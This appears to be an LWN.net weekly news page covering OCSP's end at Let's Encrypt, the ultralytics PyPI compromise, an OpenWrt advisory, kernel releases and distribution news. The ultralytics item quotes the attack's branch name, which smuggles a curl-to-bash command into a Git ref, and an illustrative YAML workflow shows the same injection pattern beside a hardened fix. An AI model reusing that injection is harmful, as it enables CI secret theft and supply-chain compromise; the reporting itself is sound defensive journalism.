
Brief items

Security

Let's Encrypt sets date for ending OCSP support

In July, Let's Encrypt announced it was ending support "as soon as possible" for the Online Certificate Status Protocol (OCSP) in favor of Certificate Revocation Lists (CRLs) due to privacy concerns. The organization has now announced that it has set a timeline, and will be turning off its OCSP responders on August 6, 2025. There is additional action required for Let's Encrypt users who use the OCSP Must Staple Extension:

As of January 30, 2025, issuance requests that include the OCSP Must Staple extension will fail, unless the requesting account has previously issued a certificate containing the OCSP Must Staple extension.

As of May 7, all issuance requests that include the OCSP Must Staple extension will fail, including renewals. Please change your ACME client configuration to not request the extension.
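Before the May 7 cutoff it is worth knowing which of your certificates were issued with the extension at all, since that is a sign the ACME client requested it. The following is an added example, not Let's Encrypt or certbot code: a minimal DER walker that locates the TLS Feature extension (RFC 7633, OID 1.3.6.1.5.5.7.1.24), which is what "OCSP Must Staple" is on the wire, and reports whether status_request (feature 5) is listed. The sample blobs at the bottom are hand-constructed extension structures, not real certificates.

```python
"""Locate the TLS Feature extension (RFC 7633, OID 1.3.6.1.5.5.7.1.24) in a
DER-encoded X.509 certificate.  "OCSP Must Staple" is that extension with the
status_request (5) feature listed.  Added example, not Let's Encrypt, ACME or
certbot code.  The test vectors at the bottom are hand-constructed.

Use on a real certificate:
    openssl x509 -in cert.pem -outform DER -out cert.der
    python3 must_staple.py cert.der
"""
import sys

TLS_FEATURE_OID = bytes.fromhex("2b06010505070118")  # 1.3.6.1.5.5.7.1.24
STATUS_REQUEST = 5          # TLS extension type number for status_request
TAG_OID, TAG_INT, TAG_CONSTRUCTED = 0x06, 0x02, 0x20


def _tlv(buf, pos):
    """Decode one DER tag-length-value at pos; return (tag, value, next_pos).
    Single-byte tags only, which is all X.509 uses."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                     # long form: count of length octets
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > len(buf):
        raise ValueError("DER length runs past end of buffer")
    return tag, buf[pos:pos + length], pos + length


def _children(value):
    """Yield (tag, value) for each TLV directly inside a constructed value."""
    pos = 0
    while pos < len(value):
        tag, inner, pos = _tlv(value, pos)
        yield tag, inner


def tls_features(der):
    """Return the feature numbers listed in the TLS Feature extension, or None
    if no such extension is present anywhere in the DER tree."""
    kids = list(_children(der))
    # Extension ::= SEQUENCE { extnID OID, critical BOOLEAN DEFAULT FALSE,
    #                          extnValue OCTET STRING }
    if len(kids) >= 2 and kids[0] == (TAG_OID, TLS_FEATURE_OID):
        _, features_seq, _ = _tlv(kids[-1][1], 0)   # extnValue wraps a SEQUENCE
        return [int.from_bytes(v, "big")
                for t, v in _children(features_seq) if t == TAG_INT]
    for tag, inner in kids:
        if tag & TAG_CONSTRUCTED:        # SEQUENCE, SET, [n] EXPLICIT: descend
            found = tls_features(inner)
            if found is not None:
                return found
    return None


def has_must_staple(der):
    """True when the certificate tells clients to require a stapled OCSP response."""
    features = tls_features(der)
    return features is not None and STATUS_REQUEST in features


# Constructed test vectors (not taken from any real certificate):
# tlsFeature extension: SEQUENCE { OID, OCTET STRING { SEQUENCE { INTEGER 5 } } }
MUST_STAPLE_EXT = bytes.fromhex("3011" "06082b06010505070118" "0405" "3003020105")
# Same extension with critical=TRUE between the OID and the value
MUST_STAPLE_EXT_CRITICAL = bytes.fromhex(
    "3014" "06082b06010505070118" "0101ff" "0405" "3003020105")
# basicConstraints (OID 2.5.29.19) CA:TRUE, which lists no TLS features
BASIC_CONSTRAINTS = bytes.fromhex("300c" "0603551d13" "0405" "30030101ff")
# An Extensions list holding both, as it would sit inside a TBSCertificate
EXTENSIONS = (b"\x30" + bytes([len(BASIC_CONSTRAINTS) + len(MUST_STAPLE_EXT)])
              + BASIC_CONSTRAINTS + MUST_STAPLE_EXT)

if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else EXTENSIONS
    print("TLS features:", tls_features(blob), "must-staple:", has_must_staple(blob))
```

The walker descends only into constructed tags, so it is not fooled by OCTET STRING or BIT STRING contents that happen to look like an extension, and it reads the last element of the extension sequence so the optional critical flag does not matter. A certificate that comes back with feature 5 was requested with Must Staple; the fix is in the ACME client configuration, not the certificate.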

Comments (35 posted)

Abusing Git branch names to compromise a PyPI package

A compromised release was uploaded to PyPI after a project automatically processed a pull request with a flawed script. The GitHub account "OpenIM Robot" (which appears to be controlled by Xinwei Xiong) opened a pull request for the ultralytics Python package. The pull request included a suspicious Git branch name:

openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)

Unfortunately, ultralytics uses the pull_request_target GitHub Actions trigger to automate some of its continuous-integration tasks. That trigger runs the workflow from the base branch of the repository, with access to the repository's secrets, but the script it ran was vulnerable to shell injection from the branch name of the pull request, so the name above was executed as a command on the runner. (The comma-separated brace expansion and the ${IFS} variables stand in for spaces, which Git does not allow in branch names.) The injected script appears to have used the credentials it had access to in order to compromise a later release uploaded to PyPI to include a cryptocurrency miner. It is hard to be sure of the details, because GitHub has already removed the malicious script.

This problem has been known for several years, but this event may serve as a good reminder to be careful with automated access to important secrets.
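The shape of the bug, as an added illustration rather than the ultralytics workflow itself: a step that interpolates the head branch name into a shell command under pull_request_target, beside the same step written so the branch name cannot be executed. The job, step and secret names are invented for the example.

```yaml
# Added example, not the ultralytics workflow. Job and secret names are made up.
on: pull_request_target   # runs base-branch workflow code, with repository secrets

jobs:
  vulnerable:             # the shape of the bug; do not copy
    runs-on: ubuntu-latest
    steps:
      # ${{ }} is substituted into the script *text* before bash parses it, so a
      # head branch named $({curl,-sSfL,host/file.sh}${IFS}|${IFS}bash) is run
      # by the runner, here with a publishing token sitting in its environment.
      - run: echo "Checking PR from branch ${{ github.head_ref }}"
        env:
          PYPI_TOKEN: ${{ secrets.PYPI_TOKEN }}

  hardened:
    runs-on: ubuntu-latest
    steps:
      # Put untrusted fields into environment variables and reference them from
      # the script: bash sees the literal word "$BRANCH" and expands it as data,
      # never as code. The same applies to PR titles, bodies and commit messages.
      - run: echo "Checking PR from branch $BRANCH"
        env:
          BRANCH: ${{ github.head_ref }}
      # Give secrets only to steps that need them, and never to a step that also
      # checks out and runs code from the pull request's head.
```

The environment-variable form fixes the injection, but it does not make pull_request_target safe on its own: a workflow that checks out the PR head and runs its build scripts while holding secrets is still handing them to the contributor. Where the job does not need write access or secrets, the plain pull_request trigger, which gives forked PRs neither, is the safer default.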

Comments (63 posted)

A vulnerability in the OpenWrt attended sysupgrade server

The OpenWrt project has issued an advisory regarding a vulnerability found in its Attended Sysupgrade Server that could allow compromised packages to be installed on a router by an attacker. No official OpenWrt images were affected, and the vulnerability is not known to be exploited, but users who have installed images created with an instance of this server are recommended to reinstall.

For a detailed description of how the exploit works, see this blog post.

Then, as the hash collision occurs, the server returns the overwritten build artifact to the legitimate request that requests the following packages. [...]

By abusing this, an attacker could force the user to upgrade to the malicious firmware, which could lead to the compromise of the device.

Comments (1 posted)

Kernel development

Kernel release status

The current development kernel is 6.13-rc2, released on December 8. Linus said:

The diffstat looks a bit unusual with 80%+ drivers, and a lot of it one-liners, but that's actually just because of a couple of automated scripts that got run after -rc1 for some cleanups. Nothing particularly interesting, but it makes for a lot of noise in the diff.

One of those scripts was the EXPORT_SYMBOL_NS() change (to make it use a quoted string for the namespace name) described in this article.

Stable updates: 6.12.2, 6.11.11, and 4.19.325 were released on December 5. Note that both 6.11.11 and 4.19.325 are the last kernels in those series. Thereafter, 6.12.3 was released on December 6 to fix a boot regression. 6.12.4 and 6.6.64 came out on December 9, followed by 6.6.65 (which only contains a build-regression fix) on December 11.

Comments (2 posted)

Quote of the week

At this point we actually provide app developers with what they've been repeatedly asking kernel filesystem engineers to provide them for the past 20 years: a way of overwriting arbitrary file data safely without needing an expensive fdatasync operation on every file that gets modified.

Put simply: atomic writes have a huge potential to fundamentally change the way applications interact with Linux filesystems and to make it *much* simpler for applications to safely overwrite user data.

Dave Chinner sees an O_PONIES solution

Comments (28 posted)

Distributions

Apertis v2024 released

Apertis is a Collabora-developed Debian derivative distribution designed to be incorporated into electronic devices; the v2024 release is now available. It is now based on the Bookworm release, and includes support for Podman, ONNX Runtime, OP-TEE, and more.

Apertis relies on the Debian Free Software Guidelines to ensure all software shipped is open source or, in limited cases, at least freely distributable. However, for some customers this is not enough to be able to adopt OSS solutions, as in their evaluations some provisions in common licenses like the GPL-3 are at odds with regulatory constraints they are subject to. Apertis does not set out to solve this decades-long debate; instead its goal is to increase the adoption of modern, maintained OSS solutions in markets where this has historically been a challenge. To enable this, Apertis supports avoiding the use of any software under some licenses (like the GPL v3.0 license family) on target images, while still making them fully available for development and for customers that do not share those licensing concerns. To avoid these licenses, Apertis uses more modern alternatives instead of relying on outdated and unmaintained pre-GPL-3 versions. For instance, coreutils and findutils (GPL-3+) are replaced in Apertis by rust-coreutils and rust-findutils.

Comments (23 posted)

‘Tis the Season for COSMIC Alpha 4! (System76 Blog)

System76 has announced the fourth alpha release of its Rust-based COSMIC desktop. New features in this version include the ability to set default applications, region and language settings, a new Accessibility applet, as well as support for variable refresh rate (VRR) in the cosmic-comp compositor and the display settings tool. See the blog post for a full list of fixes and performance improvements. LWN covered the first alpha release in August.

Comments (12 posted)

Fedora Steering Council election interviews

When the Fedora Engineering Steering Council (FESCo) is up for election, the project posts interviews of the candidates in order to help Fedora contributors make an informed choice. This year, the candidates are Zbigniew Jędrzejewski-Szmek, Tomáš Hrčka, Josh Stone, David Cantrell, Fabio Alessandro Locati, and Kevin Fenzi. All of them except for Locati are current members of the steering council. Voting is open until December 20.

Comments (none posted)

A change of hats! (Fedora Magazine)

Fedora Project Leader (FPL) Matthew Miller writes that he will soon be hanging up the FPL hat:

Stay tuned for a job posting from Red Hat, and details about all that. I'm hoping we can hire someone awesome early in 2025, and make the official handover on the release of auspiciously-numbered Fedora Linux 42.

I'm not going to leave Fedora, though. As I said above, although it might not always feel like it from the outside, Red Hat support for Fedora is stronger than ever, and I plan on helping that grow even more. I'm stepping into a full-time management role in the Community Linux Engineering organization, so Fedora will still be part of my day job, just in a different way.

Comments (1 posted)

Development

GNU Shepherd 1.0.0 released

Version 1.0.0 of the GNU Shepherd service manager has been released after a mere 21 years of development.

This 1.0.0 release is published today because we think Shepherd has become a solid tool, meeting user experience standards one has come to expect since systemd changed the game of free init systems and service managers alike. It's also a major milestone for Guix, which has been relying on the Shepherd from a time when doing so counted as dogfooding.

Comments (26 posted)

Systemd 257 released

Systemd 257 has been released. As usual, the list of changes is long; it includes support for multipath TCP in socket units, the ability to run processes as init in their own PID namespace, a new tool for signing EFI binaries for secure boot, and a superhero emoji in the run0 shell prompt, among many other things. Also, support for version-1 control groups has been disabled and requires an elaborate dance to re-enable; it will be removed entirely in the next release, along with support for System V service scripts.

Full Story (comments: 24)

Development quote of the week

I am now firmly a PostgreSQL developer, no longer really a PostgreSQL user. From the perspective of a developer, I wonder: Do these new discussion places allow interaction with developers? Do they allow interested users to become interested in becoming a developer themselves? As a developer, where should I look to monitor user vibe[s] and feedback?

On pgsql-hackers, we sometimes say things like, nobody has ever requested that, or, we have only seen three such cases in ten years. And we have the records to prove it. But if the mailing lists represent only a fraction of users overall and a fraction of users who want to interact in public, what kind of data is that?

[...] What can we do? I don't mind that there is diversity in the way of interacting with other users and enthusiasts. Some competition is good. But I think the project should provide and own at least one of the options that people actually want to use.

Peter Eisentraut

Comments (none posted)

Miscellaneous

Mozilla's new branding strategy

Mozilla would appear to have concluded that the solution to its problems is an extensive rebranding effort:

We teamed up with global branding powerhouse Jones Knowles Ritchie (JKR) to revamp our brand and revitalize our intentions across our entire ecosystem. At the heart of this transformation is making sure people know Mozilla for its broader impact, as well as Firefox. Our new brand strategy and expression embody our role as a leader in digital rights and innovation, putting people over profits through privacy-preserving products, open-source developer tools, and community-building efforts.

Comments (26 posted)

Page editor: Daroc Alden

Copyright © 2024, Eklektix, Inc.
Comments and public postings are copyrighted by their creators.
Linux is a registered trademark of Linus Torvalds